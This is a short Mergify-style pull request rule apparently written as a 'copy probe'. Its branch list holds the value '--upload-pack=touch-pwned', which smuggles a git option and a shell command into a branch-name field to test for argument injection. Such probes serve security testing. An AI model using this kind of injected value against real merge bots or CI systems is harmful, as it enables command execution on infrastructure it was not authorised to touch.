pull_request_rules:
  - name: copy probe
    conditions:
      - base=main
    actions:
      label:
        add: [copied]
      copy:
        branches:
          - --upload-pack=touch-pwned
        ignore_conflicts: true
